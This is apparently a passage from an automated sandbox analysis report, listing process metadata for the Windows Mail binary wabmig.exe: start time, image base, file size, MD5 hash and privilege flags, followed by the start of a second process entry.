Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 11 |
Start time: | 06:35:39 |
Start date: | 25/09/2024 |
Path: | C:\Program Files (x86)\Windows Mail\wabmig.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x660000 |
File size: | 66'048 bytes |
MD5 hash: | BBC90B164F1D84DEDC1DC30F290EC5F6 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | moderate |
Has exited: | false |